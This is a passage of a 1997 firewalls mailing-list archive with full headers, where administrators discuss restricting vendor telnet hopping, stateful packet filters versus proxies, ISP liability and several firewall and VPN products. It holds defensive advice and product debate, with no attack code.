them on it. Install a wrapper around (telnet, rsh, rlogin, ssh, etc). Use a restricted shell that only allows them a certain path, and give them a short list of useful tools (sed, awk, agrep, ps) to do their work, but nothing else without asking permission. * I say a TTY sniffer because of course you are using an encrypted telnet to come in over the internet. Adam Ryan Russell/SYBASE wrote: | Your two choices are to put the hosts they do get | access to into a DMZ, or to increase security on all | the other hosts in your network. In your net, option | 2 probably isn't practical. | | Ryan | | ---------- Previous Message ---------- | From: khanhi @ emirates.com (Hidayatullah Khan) @ smtp | Subject: Restrict Springboarding | | Hello All, | Ours is a large organization with a class B addressing. We have a | firewall in place to allow outgoing web and mail services. Often we | have vendors coming in to our systems to support thier applications. Our | firewall is configured to allow the vendors to telnet to specific hosts. | On a couple of occasions I have noticed a vendor's presence on a | different host for which he was not intended to. My question is how can | we restrict a vendor from "springboarding" (i.e telnetting to other | machines on our network) from the actual specific host. | Thanks in Adv, | Khan -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-firewalls-outgoing Mon Jun 9 05:40:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA18099 for firewalls-outgoing; Mon, 9 Jun 1997 05:24:33 -0700 (PDT) Received: from mail.pfsfhq.com ([199.250.186.134]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA18092 for ; Mon, 9 Jun 1997 05:24:28 -0700 (PDT) Received: from neteng02 ([199.250.186.188]) by mail.pfsfhq.com (8.6.12/8.6.9) with SMTP id MAA29645 for ; Mon, 9 Jun 1997 12:30:41 -0400 Message-Id: <199706091630.MAA29645@mail.pfsfhq.com> X-Mailer: Calypso Version 2.10.18 Date: Mon, 09 Jun 1997 08:24:42 -0400 From: "John Kemker" To: firewalls@greatcircle.com Subject: RE: ISP Connection Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm still curious about the indemnification clause. Lawyers like to reduce liability. It's their job. Insurance company lawyers like it even more than most. (Notice who I work for.) I would be very surprised if your insurance lawyers did not assist your corporate lawyers in crafting a carefully worded set of clauses in your contracts limiting your liability (and, therefore, the amount they would have to pay on a claim) to the very least amount possible. This reminds me of the situation that occurred when they were building the Hancock building in Boston. The builder had specified a particular size glass, but the glass company had delivered a slightly smaller size glass. A particularly nasty wind cropped up and pulled huge sheets of glass off the building and blew them all over Boston. Hancock went to the contractor, who in turn went to the subcontractor (the glass company). They insisted on being recompensed for the damages. The glass company filed a claim with their insurance company... ...John Hancock was their insurance company. Firewalls Moral: Be careful to know who is liable in case of a problem. It may be you. =========== REPLY PARTITION =========== On 06/06/97, at 05:15 PM, Paquette, Trevor wrote: >We have insurance for damage that may be caused by a break in. >I don't know what type of insurance it is, but it is suppose to cover >us in those situations. > > >> However what I'm curious about is whether mcc.net is really completely >> "on >> the hook" in this situation. BBN's SitePatrol, for example, comes >> with an >> extensive indemnification clause in its agreements ("if you're broken >> into, >> we're not liable"). Are you saying that mcc.net doesn't have one of >> these >> clauses in their agreements? >> John E. Kemker III Systems Engineer, Primerica Financial Services 3120 Breckinridge Blvd., Duluth, GA 30199 From owner-firewalls-outgoing Mon Jun 9 05:55:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA19566 for firewalls-outgoing; Mon, 9 Jun 1997 05:40:14 -0700 (PDT) Received: from sl001.infi.net (sl001.infi.net [205.219.238.210]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA19554 for ; Mon, 9 Jun 1997 05:40:08 -0700 (PDT) Received: (from swright@localhost) by sl001.infi.net (8.8.5/8.8.5) id IAA03006; Mon, 9 Jun 1997 08:37:36 -0400 (EDT) Date: Mon, 9 Jun 1997 08:37:36 -0400 (EDT) From: Steve Wright To: Cihan Subasi cc: Firewall Mailing List Subject: Re: Internet Secýrity Policy... In-Reply-To: <339C33ED.7A3A@garanti.com.tr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Look up RFC 1244 at internic.... On Mon, 9 Jun 1997, Cihan Subasi wrote: > I need to create an Internet & Security policy for the company,if > anybody can send me a copy of their policy or tell me where I can find > such a thing so I can take a look at it,it will be great.... > > Thanks, > -- > > > *************************************************************** > Cihan Subasi > Garanti Ticaret, Istanbul Turkey > > email= cihans@garanti.com.tr or csubasi@garanti.com.tr > Phone= +902126570404 > Fax = +902126570473 > *************************************************************** > From owner-firewalls-outgoing Mon Jun 9 06:10:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA21040 for firewalls-outgoing; Mon, 9 Jun 1997 06:04:08 -0700 (PDT) Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA21025 for ; Mon, 9 Jun 1997 06:04:01 -0700 (PDT) Received: (qmail 6307 invoked from smtpd); 9 Jun 1997 13:04:44 -0000 Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 9 Jun 1997 13:04:44 -0000 Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id IAA15877; Mon, 9 Jun 1997 08:04:44 -0500 Received: by sonic.nmti.com; id AA00887; Mon, 9 Jun 1997 08:05:32 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9706091305.AA00887@sonic.nmti.com.nmti.com> Subject: Re: nt web server log To: firewalls@scientia.com (Ian Miller) Date: Mon, 9 Jun 1997 08:05:32 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: <199706091018.LAA04284@h01.scientia.com> from "Ian Miller" at Jun 9, 97 11:17:41 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > As most robots won't keep records of 404ed pages, they will keep > coming back. If they already have a record of a page, and they get a 404, why would they keep the record around? I added a robots.txt file as soon as I understood what was happening, but it still took them from March to January to clear. > 1) They installs an appropriate robots.txt > 2) They corrects the links to your site. The referring site was always altavista, lycos, webcrawler, and so on. They had absolutely no sympathy for my situation. From owner-firewalls-outgoing Mon Jun 9 06:40:49 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA22818 for firewalls-outgoing; Mon, 9 Jun 1997 06:17:59 -0700 (PDT) Received: from datacommcorp.com ([206.152.253.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA22759 for ; Mon, 9 Jun 1997 06:17:46 -0700 (PDT) Message-Id: <199706091317.GAA22759@honor.greatcircle.com> Received: from [199.34.57.89] by datacommcorp.com (SMTPD32-95.10.15) id A37C590168; Mon Jun 09 09:22:04 1997 From: "Steve Rudolph" To: "firewalls" Subject: Centri Anyone? Date: Mon, 9 Jun 1997 09:21:42 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1161 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello group, I am still kind of new here, but there has been many replies in regards to my Cisco router situation, and my earlier nt routing/FW-1 issues. Thanks for all of your public and private replies, they have all been very helpful. I saw someone mention this Centri firewall in the group late last week and it looked like a good firewall at their site. http://www.centri.com I requested informaion from them and are awaiting the arrive of the more detailed white papers. Has anyone had any experience with this Centri? It looks like this firewall combines all of the latest and greatest firewall stuff. Any comments welcome. Steve Rudoph http://www.datacommcorp.com srudolph@datacommcorp.com http://www.rude-dog.com From owner-firewalls-outgoing Mon Jun 9 06:48:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA20421 for firewalls-outgoing; Mon, 9 Jun 1997 05:52:12 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA20404 for ; Mon, 9 Jun 1997 05:51:56 -0700 (PDT) Message-Id: <199706091251.FAA20404@honor.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA241830358; Mon, 9 Jun 1997 22:45:58 +1000 From: Darren Reed Subject: Re: Stateful Packet Filters vs. Proxies To: hagan@cih.com Date: Mon, 9 Jun 1997 22:45:58 +1000 (EST) Cc: Ryan.Russell@sybase.com, sjg@quick.com.au, firewalls@GreatCircle.COM In-Reply-To: from "Craig I. Hagan" at Jun 8, 97 10:05:02 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Craig I. Hagan, sie said: > > > Sure, an FTP proxy that can decrypt your > > encrypted FTP session will work, same as > > a SPF with the same features will. > > > > If a SPF or a proxy can act as one endpoint > > of an ancrypted connection, it can watch > > for the port command and deal with it. > > > > You seem to be under the impression that SPFs > > aren't capable of understaning the protocol > > being routed... if that were the case, the non-encrypted > > FTP session wouldn't work over the PIX box with NAT > > emabled, would it? There is no reason that the SPF > > software can't be designed to act as an encryption > > endpoint, but apparantly the PIX hasn't for FTP. > > > > I agree with you that you can make an SPF which can > handle any case that a proxy can. However, it is far > easier for the end user (read f/w implementor) to modify > proxy code such that it will match the requirements > of his/her site than it is for the end user to modify > an SPF. Add to this discussion that, to date, SPF's (and in-kernel proxies) have yet to be proven to be as reliable as real proxies. There have been cases emerge here in which the flaws in current implementations (of SPFs) became evident. FWIW, a SPF != a proxy And whilst "anything is possible", current SPF technology does not yet appear to have advanced far enough to allow them to work as universally well as proxies. Darren From owner-firewalls-outgoing Mon Jun 9 06:51:35 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA22058 for firewalls-outgoing; Mon, 9 Jun 1997 06:13:00 -0700 (PDT) Received: from interlock.amoco.com (interlock.amoco.com [192.195.167.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA22024 for ; Mon, 9 Jun 1997 06:12:51 -0700 (PDT) From: dmburns@amoco.com Received: by interlock.amoco.com id AA08710 (InterLock SMTP Gateway 3.0 for firewalls-digest@greatcircle.com); Mon, 9 Jun 1997 08:13:34 -0500 Message-Id: <199706091313.AA08710@interlock.amoco.com> Received: by interlock.amoco.com (Protected-side Proxy Mail Agent-3); Mon, 9 Jun 1997 08:13:34 -0500 Received: by interlock.amoco.com (Protected-side Proxy Mail Agent-2); Mon, 9 Jun 1997 08:13:34 -0500 Received: by interlock.amoco.com (Protected-side Proxy Mail Agent-1); Mon, 9 Jun 1997 08:13:34 -0500 X-Openmail-Hops: 1 Date: Mon, 9 Jun 97 08:13:30 -0500 Subject: Another Winframe question Mime-Version: 1.0 To: firewalls-digest@greatcircle.com Content-Type: multipart/mixed; boundary="openmail-part-00cc2f3f-00000001" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --openmail-part-00cc2f3f-00000001 Content-Type: application/octet-stream; name="1.txt" Content-Disposition: attachment; filename="1.txt" Content-Transfer-Encoding: base64 UmVjZWl2ZWQ6IGZyb20gY29ycG14MDEgKGNvcnBteDAxLnRkYy5hbW9jby5jb20gWzE0OS4x ODMuODIuMjA4XSkgYnkgaG91ZW9zZDUuYW1vY28uY29tIHdpdGggU01UUCAoOC43LjYvOC43 LjMpIGlkIElBQTExMTUyIGZvciA8emRtYjA1QGhvdWVvc2Q1PjsgTW9uLCA5IEp1biAxOTk3 IDA4OjEwOjAzIC0wNTAwIChDRFQpDQpSZWNlaXZlZDogZnJvbSBob3NtMTIyYSBieSBjb3Jw bXgwMSAoU01JLTguNi9TTUktNC4wKQ0KCWlkIElBQTIzNzM1OyBNb24sIDkgSnVuIDE5OTcg MDg6MDA6MjkgLTA1MDANClJlY2VpdmVkOiBmcm9tIGludGVybG9jay5hbW9jby5jb20gYnkg aG9zbTEyMmEgKFNNSS04LjYvU01JLVNWUjQpDQoJaWQgSUFBMTA3MDg7IE1vbiwgOSBKdW4g MTk5NyAwODoxMzozNyAtMDUwMA0KUmVjZWl2ZWQ6IGZyb20gaG9zbTEyMmEgKGhvc20xMjJh LmhvdS5hbW9jby5jb20pIGJ5IHBvcnRhbC5hbW9jby5jb20gaWQgQUEwODI2MQ0KICAoSW50 ZXJMb2NrIFNNVFAgR2F0ZXdheSAzLjAgZm9yIDx6ZG1iMDVAaG91ZW9zZDUuYW1vY28uY29t Pik7DQogIE1vbiwgOSBKdW4gMTk5NyAwODowOToxNiAtMDUwMA0KRGF0ZTogTW9uLCA5IEp1 biAxOTk3IDA4OjA5OjE2IC0wNTAwDQpGcm9tOiBNYWlsIERlbGl2ZXJ5IFN1YnN5c3RlbSA8 TUFJTEVSLURBRU1PTkBhbW9jby5jb20+DQpNZXNzYWdlLUlkOiA8MTk5NzA2MDkxMzA5LkFB MDgyNjFAcG9ydGFsLmFtb2NvLmNvbT4NClRvOiB6ZG1iMDVAaG91ZW9zZDUuYW1vY28uY29t DQpTdWJqZWN0OiBSZXR1cm5lZCBtYWlsOiBIb3N0IHVua25vd24NCg== --openmail-part-00cc2f3f-00000001 Content-Type: text/plain; charset=US-ASCII; name="Returned" Content-Disposition: inline; filename="Returned" Content-Transfer-Encoding: 7bit Is the session between the ICA client and the server encrypted ? If so, what encyrption techniques are used ? If anyone has implemented this, I'm curious about how much work it is to administer ? TIA, David Burns --openmail-part-00cc2f3f-00000001-- From owner-firewalls-outgoing Mon Jun 9 06:55:47 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA24659 for firewalls-outgoing; Mon, 9 Jun 1997 06:29:10 -0700 (PDT) Received: from proxy.src.siemens.es (ms1.src.siemens.es [195.53.72.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA24519 for ; Mon, 9 Jun 1997 06:28:39 -0700 (PDT) Received: from cceballos.src.siemens.es by proxy.src.siemens.es with SMTP (Microsoft Exchange Internet Mail Service Version 5.0.1457.7) id MS2CPM7Q; Mon, 9 Jun 1997 15:33:19 +0200 Message-ID: <339C06B3.60DA@src.siemens.es> Date: Mon, 09 Jun 1997 15:35:47 +0200 From: Cristina Ceballos Reply-To: cceballos@src.siemens.es Organization: Siemens Redes Corporativas X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: SecuRemote on FireWall-1 3.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk POST Hello, I am trying to use Securemote to access the internal network from the internet in an encryted manner. In order to do that I have to install the securemote client on the PC accessing my network from the Internet and also, on the servers side, Securemote is implemented on top of a Firewall-1 Virtual Private network. My questions are: Is a Virtual Private Network just an object (network type) I have to define???? Do I need to have a Certified Key in order to be able to use this encryption???? (I shoundt..) If anyone is using SecureRemote I would appreciate your help. Thans. Cristina Ceballos -- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: INAS 1.0.2 mQCNAjNfHNsAAAEEAMDAXftbeYZEfqRDRLJSxoMRoWjizoY+0sIh4FvrNkrW4A5Y qEdpPJhwT7nIRQX5iI0HFSWUjYCNwUqvloiWZHJ1aCZpv6exfYthOcnEoRLnu9Vp sXEpZ8XT4iQMM9QTeRlDvtlHYbtVJal9bSK5bs+62Z9Kcp3Tj0I7PxDU55yBAAMF tCxDcmlzdGluYSBDZWJhbGxvcyA8Y2NlYmFsbG9zQHNyYy5zaWVtZW5zLmVzPokA lQIFEDNfHNtCOz8Q1OecgQEBVW4D/AgekAW+MxDk6VAWJOW3ZaYGggQVnH2kPZGP Ox0t7TKrfsMhQItYLfQCjQl3/PQ4rCRUv3g0mcSa4ctXB21mNVkI0B3s9iVM59p1 cvQMUnmdVqkBVoslMuktqnfTIVSCY0FvFFAN5QhK4fN89LOpqleg509CrRQhrlVB 5c2YKtKk =tBjV -----END PGP PUBLIC KEY BLOCK----- From owner-firewalls-outgoing Mon Jun 9 07:53:13 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA06221 for firewalls-outgoing; Mon, 9 Jun 1997 07:28:13 -0700 (PDT) Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id HAA06100 for ; Mon, 9 Jun 1997 07:27:45 -0700 (PDT) Received: from newman by newman (SMI-8.6/SMI-SVR4) id KAA04840; Mon, 9 Jun 1997 10:25:29 -0400 Message-ID: <339C1259.E207AD87@unifiedtech.com> Date: Mon, 09 Jun 1997 10:25:29 -0400 From: Mike Jones Organization: Unified Technologies, Inc. X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4u) MIME-Version: 1.0 To: Darren Reed CC: hagan@cih.com, Ryan.Russell@sybase.com, sjg@quick.com.au, firewalls@GreatCircle.COM Subject: Re: Stateful Packet Filters vs. Proxies X-Priority: 3 (Normal) References: <199706091251.FAA20404@honor.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren Reed wrote: > Darren Reed writes... > In some mail from Craig I. Hagan, sie said: > > > Sure, an FTP proxy that can decrypt your > > > encrypted FTP session will work, same as > > > a SPF with the same features will. > > > If a SPF or a proxy can act as one endpoint > > > of an ancrypted connection, it can watch > > > for the port command and deal with it. > > > You seem to be under the impression that SPFs > > > aren't capable of understaning the protocol > > > being routed... if that were the case, the non-encrypted > > > FTP session wouldn't work over the PIX box with NAT > > > emabled, would it? There is no reason that the SPF > > > software can't be designed to act as an encryption > > > endpoint, but apparantly the PIX hasn't for FTP. > > I agree with you that you can make an SPF which can > > handle any case that a proxy can. However, it is far > > easier for the end user (read f/w implementor) to modify > > proxy code such that it will match the requirements > > of his/her site than it is for the end user to modify > > an SPF. > Add to this discussion that, to date, SPF's (and in-kernel proxies) > have > yet to be proven to be as reliable as real proxies. There have been > cases emerge here in which the flaws in current implementations (of > SPFs) > became evident. Details, please? Which flaws? What cases? This is clearly the conventional wisdom, but details are very hard to come by. I'll admit right up front that I'm interested because we sell FW-1; if there are serious problems with the product, I want to know so I can stop recommending it to people. -- Mike Jones Sr. Technology Advisor UNIFIED Technologies From owner-firewalls-outgoing Mon Jun 9 08:01:40 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA08832 for firewalls-outgoing; Mon, 9 Jun 1997 07:41:51 -0700 (PDT) Received: from nebula.is.rpslmc.edu (nebula.is.rpslmc.edu [144.74.19.111]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id HAA08736 for ; Mon, 9 Jun 1997 07:41:30 -0700 (PDT) Received: (qmail 24047 invoked by uid 2001); 9 Jun 1997 14:46:37 -0000 Date: Mon, 9 Jun 1997 09:46:36 -0500 (CDT) From: "Daniel G. Drumm" To: Hidayatullah Khan cc: "Firewalls@GreatCircle.COM" Subject: Re: Restrict Springboarding In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 8 Jun 1997, Hidayatullah Khan wrote: > Hello All, > Ours is a large organization with a class B addressing. We have a > firewall in place to allow outgoing web and mail services. Often we > have vendors coming in to our systems to support thier applications. Our > firewall is configured to allow the vendors to telnet to specific hosts. > On a couple of occasions I have noticed a vendor's presence on a > different host for which he was not intended to. My question is how can > we restrict a vendor from "springboarding" (i.e telnetting to other > machines on our network) from the actual specific host. > Thanks in Adv, > Khan > > Khan@Bigfoot.com > Two answers: 1. Install wrappers on all the hosts that disallow telnet between themselves. Perhaps unruly, or untenable. 2. Install a restricted shell for the vendor, which allows them a highly restriced subset of commands needed only to get the work done. Disallow telnet to that account. Perhaps wrap telnet and rlogin. 3. Place a sniffer unit with logging on a segment. Log for outbound telnet from a machine with the "offending" login. Once logged, present to your legal department, or the vendor's legal department, or something scary and litigous like that. -- Daniel G. Drumm - ddrumm@rush.edu Rush Presbyterian St. Luke's Medical Center - Chicago, IL Network Division - Information Services From owner-firewalls-outgoing Mon Jun 9 08:10:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA12904 for firewalls-outgoing; Mon, 9 Jun 1997 08:06:23 -0700 (PDT) Received: from cih-gw.cih.com (cih-gw.cih.com [204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA12855 for ; Mon, 9 Jun 1997 08:06:09 -0700 (PDT) Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id LAA20483; Mon, 9 Jun 1997 11:07:21 -0400 X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd20480aaa; Mon Jun 9 15:07:14 1997 Date: Mon, 9 Jun 1997 11:07:14 -0400 (EDT) From: "Craig I. Hagan" Reply-To: hagan@cih.com To: Darren Reed cc: Ryan.Russell@sybase.com, sjg@quick.com.au, firewalls@GreatCircle.COM Subject: Re: Stateful Packet Filters vs. Proxies In-Reply-To: <199706091251.FAA20404@honor.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Add to this discussion that, to date, SPF's (and in-kernel proxies) have > yet to be proven to be as reliable as real proxies. There have been > cases emerge here in which the flaws in current implementations (of SPFs) > became evident. > > FWIW, a SPF != a proxy agreed. if i may extend your point, it is also easier to verify a proxy agent than it is an SPF as you have many more controls that you can use in your experiment: * source code review * easier black box testing - you can move the proxy agent to through a set of known operating systems to reduce the amount of possible os contamination in your tests my issues with SPFs aren't that they can't be secure, but, that they are being mismarketed. i don't think that everyone needs maximal security, but, people should understand the tradeoffs that they are making when they choose technology A over B, e.g. choosing an SPF (or similar strategy) over a proxy. > And whilst "anything is possible", current SPF technology does not yet > appear to have advanced far enough to allow them to work as universally > well as proxies. I would like to see what the cpu requirements would be to f/w a T3, 100mb ethernet, and (where possible) 1gb ethernet connections using proxies on following (optimially configured, of course): * commercial unix hw+sw (e.g. sun, alpha +osf/1) * commercial unix sw + pc hw (e.g. stuff like solaris x86, bsdi) * commercial hw + PD unices (e.g.alpha+linux/*bsd;sun+linux/*bsd,etc) * pc hw, pd unix (pc+linux/*bsd, etc) but, hey, that is wishful thinking on my part :) -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Mon Jun 9 08:47:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA08170 for firewalls-outgoing; Mon, 9 Jun 1997 07:37:33 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA08146 for ; Mon, 9 Jun 1997 07:37:25 -0700 (PDT) Message-Id: <199706091437.HAA08146@honor.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA265396701; Tue, 10 Jun 1997 00:31:41 +1000 From: Darren Reed Subject: Re: Stateful Packet Filters vs. Proxies To: mike.jones@unifiedtech.com (Mike Jones) Date: Tue, 10 Jun 1997 00:31:41 +1000 (EST) Cc: hagan@cih.com, Ryan.Russell@sybase.com, sjg@quick.com.au, firewalls@GreatCircle.COM In-Reply-To: <339C1259.E207AD87@unifiedtech.com> from "Mike Jones" at Jun 9, 97 10:25:29 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Mike Jones, sie said: > > Darren Reed wrote: > > > Darren Reed writes... > > In some mail from Craig I. Hagan, sie said: > > > > Sure, an FTP proxy that can decrypt your > > > > encrypted FTP session will work, same as > > > > a SPF with the same features will. > > > > If a SPF or a proxy can act as one endpoint > > > > of an ancrypted connection, it can watch > > > > for the port command and deal with it. > > > > You seem to be under the impression that SPFs > > > > aren't capable of understaning the protocol > > > > being routed... if that were the case, the non-encrypted > > > > FTP session wouldn't work over the PIX box with NAT > > > > emabled, would it? There is no reason that the SPF > > > > software can't be designed to act as an encryption > > > > endpoint, but apparantly the PIX hasn't for FTP. > > > I agree with you that you can make an SPF which can > > > handle any case that a proxy can. However, it is far > > > easier for the end user (read f/w implementor) to modify > > > proxy code such that it will match the requirements > > > of his/her site than it is for the end user to modify > > > an SPF. > > Add to this discussion that, to date, SPF's (and in-kernel proxies) > > have > > yet to be proven to be as reliable as real proxies. There have been > > cases emerge here in which the flaws in current implementations (of > > SPFs) > > became evident. > > Details, please? Which flaws? What cases? This is clearly the > conventional wisdom, but details are very hard to come by. > > I'll admit right up front that I'm interested because we sell > FW-1; if there are serious problems with the product, I want to > know so I can stop recommending it to people. In several reports, last year, it became apparent that Gauntlet (and I suspect the FWTK) would not work with FW1 because the "PORT" command was split over two packets (although this is now claimed to be fixed). The point being, FW1 doesn't try to recreate the upper layers of data properly, so anything which doesn't fit in one packet requiers them to provide "special case handling". What they (and consumers) don't seem to realise that all of TCP is a "special case". Consequently, thier entire suite of TCP proxies could be considered to be "flawed". If you're curious about "how", then look at the Linux FTP masquerade code - it too looks for everything in one packet (when I last looked). Darren From owner-firewalls-outgoing Mon Jun 9 10:07:02 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA29684 for firewalls-outgoing; Mon, 9 Jun 1997 09:40:22 -0700 (PDT) Received: from lancomp-gate.LANcomp.COM (lancomp-gate.lancomp.com [199.170.17.253]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA26788 for ; Mon, 9 Jun 1997 09:21:49 -0700 (PDT) Received: from devils.LANcomp.COM by lancomp-gate.LANcomp.COM via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 9 Jun 1997 16:22:33 UT Received: from localhost by LANcomp.COM (5.x/SMI-SVR4) id AA18372; Mon, 9 Jun 1997 12:22:33 -0400 Date: Mon, 9 Jun 1997 12:22:33 -0400 (EDT) From: Mike Ordun X-Sender: mro@devils To: firewalls@greatcircle.com Subject: Re: Stateful Packet Filters vs. Proxies In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Have been following this discussion with a lot of interest as a reseller of both SPF and proxy firewalls. I happen to believe that both are appropriate in different circumstances and customer need. Nevertheless, I am a little troubled by the claims that SPFs are inherently insecure. Let me present a challenge. Lets compare some specific commercial offerings -- Firewall-1 in one corner representing SPF and say Gauntlet, Raptor, or ANS in the other representing the proxy approach. What I would like is some specific vulnerability that I cannot protect myself from using the SPF as opposed to the proxy approach. Again just for emphasis, I am interested in specific vulnerabilities not just restatement that in theory proxies are better because they deal with the protocol at the application layer. My somewhat cynical hypothesis, until proven wrong with specific example, is that the majority of proxies are really not better and in fact may be no more than an disguised SPF with address translation. Mike Ordun mordun@lancomp.com From owner-firewalls-outgoing Mon Jun 9 10:16:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA13665 for firewalls-outgoing; Mon, 9 Jun 1997 08:10:53 -0700 (PDT) Received: from docws001.shl.com (docws001.shl.com [159.249.56.252]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA13645 for ; Mon, 9 Jun 1997 08:10:40 -0700 (PDT) Received: from ottmsooc02.ooc.shl.com (ottmsooc02.ooc.shl.com [159.249.112.25]) by docws001.shl.com (8.7.3/8.7.3) with SMTP id KAA32978 for ; Mon, 9 Jun 1997 10:00:36 -0500 Received: by ottmsooc02.ooc.shl.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC74C5.FA185810@ottmsooc02.ooc.shl.com>; Mon, 9 Jun 1997 11:12:11 -0400 Message-ID: From: SMITH Michael To: "'Firewalls@GreatCircle.COM'" Subject: FW: ISP Connection Date: Mon, 9 Jun 1997 11:07:00 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I haven't seen anyone else mention this in this thread, so... It seems there is an ISP that is making a name for itself as a very secure service provider. They are Pilot Network Systems. According to an article in Fortune magazine (Feb. 3, '97): "Rather than connect directly to the Internet, Pilot's corporate clients hook their networks to one of the company's service centers around the country. There, for about $5,000 per client per month, Pilot provides supervised Internet access. This involves a 'dynamic' five-layered firewall with data pathways it routinely alters to fool hackers. The system is monitored around the clock by a team of electronic cops (human ones). ... Last year, Trident Data Systems... conducted an independent review of Pilot's system. Its report concluded that 'of all the various audits Trident has performed, Pilot was by far the most secure network we have encountered.' " I don't know much else about them. They have a web site at http://www.pilot.net/. Their firewall is proprietary. I haven't looked at the details so I can't say much more about their architecture. Mike Smith Security Consultant SHL Systemhouse, An MCI Company From owner-firewalls-outgoing Mon Jun 9 10:31:05 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA05784 for firewalls-outgoing; Mon, 9 Jun 1997 10:19:31 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA05769 for ; Mon, 9 Jun 1997 10:19:22 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) 